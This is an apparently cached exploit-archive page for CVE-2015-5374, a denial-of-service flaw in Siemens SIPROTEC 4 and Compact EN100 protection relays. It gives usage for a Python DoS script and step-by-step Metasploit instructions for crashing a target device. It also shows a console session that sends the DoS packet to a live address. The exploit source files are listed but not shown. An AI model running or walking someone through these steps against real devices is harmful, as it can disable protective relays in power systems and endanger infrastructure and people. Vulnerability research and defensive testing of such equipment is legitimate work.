Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2015-5374 PoC — Siemens SIPROTEC 4和SIPROTEC Compact EN100模块拒绝服务漏洞

Source
https://github.com/can/CVE-2015-5374-DoS-PoC
Associated Vulnerability
Title:Siemens SIPROTEC 4和SIPROTEC Compact EN100模块拒绝服务漏洞 (CVE-2015-5374)
Description:Siemens SIPROTEC 4和SIPROTEC Compact都是德国西门子(Siemens)公司的产品。Siemens SIPROTEC 4是一款具有友好人机界面的多功能继电器系列产品。SIPROTEC Compact是一款微机保护装置。EN100是其中的一个多格式编码器模块。 Siemens SIPROTEC 4和SIPROTEC Compact设备的EN100模块中存在安全漏洞。远程攻击者可通过向UDP 50000端口发送特制的数据包利用该漏洞造成拒绝服务。以下版本受到影响:使用4.25之前
Description
CVE-2015-5374 Denial of Service PoC
Readme
CVE-2015-5374 Siemens SIPROTEC 4 and SIPROTEC Compact EN100 Ethernet Module < V4.25 - Denial of Service
====================================
This code sends a specially crafted packet to Port 50000/UDP could cause a denial of service of the affected device. A manual reboot is required to return the device to service. CVE-2015-5374 and a CVSS v2 base score of 7.8 have been assigned to this vulnerability.
```
can@exploit:~/siprotec_dos_poc$ python Siemens_SIPROTEC_DoS.py <target>
CVE-2015-5374 Siemens SIPROTEC 4 and SIPROTEC Compact EN100 Ethernet Module < V4.25 - Denial of Service
Sending packet to <target> ...
Done, say goodbye!
```
## Metasploit Module

This module sends a specially crafted packet to Port 50000/UDP could cause a denial of service of the affected device. A manual reboot is required to return the device to service. 
## Verification Steps

  1. Do: ```use auxiliary/dos/scada/siemens_siprotec4```
  2. Do: ```set RHOST [Target IP]```, replacing ```[Target IP]``` with the IP address you wish to attack.
  3. Do: ```run```
  4. If the Siemens SIPROTEC 4 or Compact device has one of the vulnerable versions, it will immediately crash.

## Options

  ```set RHOST [Target IP]```, ```set RPORT [Target Port (Default 50000)]```.

## Scenarios

  ```
msf auxiliary(siemens_siprotec4) > info

       Name: Siemens SIPROTEC 4 and SIPROTEC Compact EN100 Ethernet Module < V4.25 - Denial of Service 
     Module: auxiliary/dos/scada/siemens_siprotec4
    License: Metasploit Framework License (BSD)
       Rank: Normal

Provided by:
  M. Can Kurnaz

Basic options:
  Name   Current Setting  Required  Description
  ----   ---------------  --------  -----------
  RHOST                   yes       The target address
  RPORT  50000            yes       The target port (UDP)

Description:
  This module sends a specially crafted packet to port 50000/UDP 
  causing a denial of service of the affected (Siemens SIPROTEC 4 and 
  SIPROTEC Compact) devices. A manual reboot is required to return the 
  device to service. CVE-2015-5374 and a CVSS v2 base score of 7.8 
  have been assigned to this vulnerability.

References:
  https://www.exploit-db.com/exploits/44103/
  https://ics-cert.us-cert.gov/advisories/ICSA-15-202-01

msf auxiliary(siemens_siprotec4) > show options 

Module options (auxiliary/dos/scada/siemens_siprotec4):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  50000            yes       The target port (UDP)

msf auxiliary(siemens_siprotec4) > set rhost 192.168.1.61
rhost => 192.168.1.61
msf auxiliary(siemens_siprotec4) > run

[*] Sending DoS packet ... 
[*] Auxiliary module execution completed
msf auxiliary(siemens_siprotec4) > 
```
File Snapshot

 [4.0K]  /data/pocs/a2a6ee5bb8ed5eaa3584d32d0e72cd5c9501e3a3
├── [2.7K]  README.md
├── [1.5K]  siemens_siprotec4.rb
└── [1.1K]  Siemens_SIPROTEC_DoS.py

0 directories, 3 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.